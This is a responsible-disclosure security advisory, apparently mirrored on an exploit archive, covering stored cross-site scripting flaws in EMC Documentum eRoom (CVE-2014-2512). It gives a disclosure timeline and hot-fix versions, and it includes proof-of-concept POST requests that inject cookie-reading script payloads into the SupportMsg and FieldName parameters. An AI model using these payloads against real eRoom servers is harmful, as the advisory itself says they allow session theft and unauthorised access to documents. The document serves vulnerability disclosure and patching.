Exploit the possiblities

EMC Documentum eRoom Stored Cross Site Scripting

EMC Documentum eRoom Stored Cross Site Scripting
Posted Jul 2, 2014
Authored by M. Heinzl | Site sec-consult.com

EMC Documentum eRoom versions 7.4.3, 7.4.4, and 7.4.4 SP1 suffer from a stored cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2014-2512
MD5 | 86b512fb87a75eadf4eefeee88168426

EMC Documentum eRoom Stored Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SEC Consult Vulnerability Lab Security Advisory 20140701-0
=======================================================================
title: Stored cross-site scripting vulnerabilities
product: EMC Documentum eRoom
vulnerable version: 7.4.3, 7.4.4, 7.4.4 SP1
fixed version: 7.4.3 ESA-2014-060 (hot fix)
7.4.4 P19
7.4.4 SP1 ESA-2014-060 (hot fix)
CVE: CVE-2014-2512
impact: high
homepage: http://www.emc.com/products/detail/software2/eroom.htm
found: 2013-11-25
by: M. Heinzl
SEC Consult Vulnerability Lab
https://www.sec-consult.com/
=======================================================================


Vendor description:
- -------------------

"EMC Documentum eRoom is easy-to-use online team collaboration software that
enables distributed teams to work together more efficiently. With Documentum
eRoom, teams around the world can accelerate document collaboration and group
activities, improve the development and delivery of products and services,
optimize collaborative business processes, improve innovation, and streamline
decision-making."

http://www.emc.com/products/detail/software2/eroom.htm


Vulnerability overview/description:
- -----------------------------------

Documentum eRoom suffers from multiple permanent cross-site scripting
vulnerabilities, which allow an attacker to steal other user's sessions, to
impersonate other users and to gain unauthorized access to documents hosted in
eRooms. A JavaScript worm could be utilized to crawl an eRoom and gather all
available documents.

There are many parameters which are not properly sanitized and thus are
vulnerable to XSS.


Proof of concept:
- -----------------

1) When creating a new database, the parameter used for the database fields
("SupportMsg") is not properly validated and is thus prone to permanent
cross-site scripting.

Request:
POST
/eRoomASP/eRoomSubmit.asp?FormName=sDlgGeneral&Ctxt=S_1&IsERPage=TRUE&ERClickInMap=FALSE&command=btnOK&SessionKey=ZQCH5DHHZLLV6
HTTP/1.1
Host: localhost

IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=ZQCH5DHHZLLV6&ERWindowName=eRw1342094805&EditSiteName=SEC&IEUsersWorkOffline=on&AllowExtAppCommands=on&EnableWebDav=on&UseSecureCookies=on&ExpireSession=60&AlertAdminsObjectCount=on&PercentageObjectLimit=80&MembersChoosePluginOption=on&EnableFileBlocking=on&BlockedFileExtensions=accda%0D%0Aaccdb%0D%0Aaccde%0D%0Aasa%0D%0Aasp%0D%0Aaspx%0D%0Abat%0D%0Achm%0D%0Aclass%0D%0Acmd%0D%0Acom%0D%0Acpl%0D%0Acrt%0D%0Adll%0D%0Aexe%0D%0Ahlp%0D%0Ahta%0D%0Ahtm%0D%0Ahtml%0D%0Ahtw%0D%0Ahtx%0D%0Ains%0D%0Aisp%0D%0Ajs%0D%0Ajse%0D%0Alnk%0D%0Amda%0D%0Amdb%0D%0Amde%0D%0Amdt%0D%0Amdw%0D%0Amdz%0D%0Amht%0D%0Amhtml%0D%0Amsp%0D%0Aocx%0D%0Areg%0D%0Ascr%0D%0Asct%0D%0Ashb%0D%0Ashs%0D%0Aurl%0D%0Avbe%0D%0Avbs%0D%0Awsc%0D%0Awsh&OverrideURL=asd&SupportMsg=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&OtherInfoString=asd&PaginationThreshold=500&LMLThreshold=500&HMLThreshold=5000&RolodexTabs=A%3BB%3BC%3BD%3BE%3BF%3BG%3BH%3BI%3BJ%3BK%3BL%3B
M%3BN%3BO%3BP%3BQ%3BR%
3BS%3BT%3BU%3BV%3BW%3BX%3BY%3BZ


2) The parameter "FieldName" is not properly validated and is thus prone to
permanent cross-site scripting. A malicious payload will be executed when the
asp script "ErrLoadingPage.asp" is called.

Request:
POST
/eRoomASP/eRoomSubmit.asp?FormName=sDlgCreateDBField&Ctxt=.test.imgsrcxonerroralert33.0_b97&ERClickInMap=FALSE&command=btnNext&SessionKey=N377T7XGBMJOO
HTTP/1.1
Host: localhost

IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=N377T7XGBMJOO&ERWindowName=eRw1342086593&FieldName=xxx%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29+%2F%3E&FieldType=0


Vulnerable / tested versions:
- -----------------------------
The vulnerabilities have been verified to exist in version 7.4.4 P11.


Vendor contact timeline:
- ------------------------
2013-12-10: Contacting vendor through security_alert@emc.com
2013-12-10: Vendor will get back after investigation by December 19th.
2013-12-20: Vendor is still investigating vulnerabilities, will get back in
January
2014-02-25: Vulnerabilities are confirmed, patch is issued for Q3 2014
2014-03-13: Notify vendor that the advisory will be published in accordance to
the responsible disclosure policy on 2014-04-20
2014-03-20: Vendor will publish patch end of June 2014
2014-03-31: Agreed to disclose advisory responsibly end of June 2014
2014-06-13: Vendor fixed issues, asking for credit line
2014-06-16: Providing credit line, asking for exact publication date
2014-06-16: Vendor announces patched version for 2014-06-30
2014-07-01: Publication of security advisory


Solution:
- ---------

Upgrade or apply hot fixes:
* 7.4.3 ESA-2014-060 (hot fix)
* 7.4.4 P19
* 7.4.4 SP1 ESA-2014-060 (hot fix)

Patches can be downloaded here:
https://support.emc.com/downloads/5324_Documentum-eRoom

Workaround:
- -----------
None


Advisory URL:
- -------------

https://www.sec-consult.com/en/advisories.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com


EOF M. Heinzl / @2014

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBAgAGBQJTspMiAAoJECyFJyAEdlkKd14H/1XRfbn4aYlVvMVyCKzg0vqp
JDwu0ZCOZ1gWmCXxJVBB057M2olK9eZL6TM2ONHIwKVSR7bJ3oQOQfz9SUpZCMpQ
V5lZqb4wY6jESj0Vqeq4/QNM1xA+6z83BeokuLg2nZyRJAnT5LLMXtaw5cM4OMcZ
54PO66I5YkuMyyMTQWicscEPwu1bIpW5w2IjtYC9ZCr7c8vFKYPRBfX6ZC/mFKYb
T209peeLrV5dlz7e0q0AH2+llpEeeex06hH53KLG1koNJclDgBbnBA6YWMu74DgT
KRY/n8ZSUs1etiE31jYBrCSpYk0xrfdALufs3pDHFm7m/hOSfvABx+VBRqxEHjw=
=Px4D
-----END PGP SIGNATURE-----

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    4 Files
  • 19
    Nov 19th
    2 Files
  • 20
    Nov 20th
    9 Files
  • 21
    Nov 21st
    15 Files
  • 22
    Nov 22nd
    23 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close